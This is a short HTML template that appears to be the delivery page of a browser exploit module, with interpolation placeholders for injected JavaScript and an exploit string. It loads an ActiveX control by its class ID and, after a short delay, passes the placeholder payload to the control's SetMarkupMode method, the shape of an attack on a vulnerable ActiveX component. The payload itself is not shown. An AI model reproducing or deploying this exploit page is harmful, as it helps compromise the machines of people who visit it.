<html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' />
    </object>
    <script>
      setTimeout(function(){ obj.SetMarkupMode("#{sploit}"); }, 100);
    </script>
    </body>
    </html>